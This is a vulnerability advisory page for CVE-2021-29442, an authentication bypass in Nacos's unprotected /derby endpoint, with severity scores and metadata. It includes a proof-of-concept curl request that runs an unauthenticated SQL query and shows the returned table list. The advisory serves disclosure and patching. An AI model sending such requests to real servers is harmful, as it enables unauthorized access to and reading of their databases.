logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2021-29442 com.alibaba.nacos:nacos-common

Package

Manager: maven
Name: com.alibaba.nacos:nacos-common
Vulnerable Version: >=0 <1.4.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.94002 pctl0.99884

Details

Authentication bypass for specific endpoint The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. For example, the following request will list the tables of the database: ``` ❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st' {"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}% ``` These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)

Metadata

Created: 2021-04-27T20:09:25Z
Modified: 2021-05-10T15:11:26Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-xv5h-v7jh-p2qh/GHSA-xv5h-v7jh-p2qh.json
CWE IDs: ["CWE-306"]
Alternative ID: GHSA-xv5h-v7jh-p2qh
Finding: F006
Auto approve: 1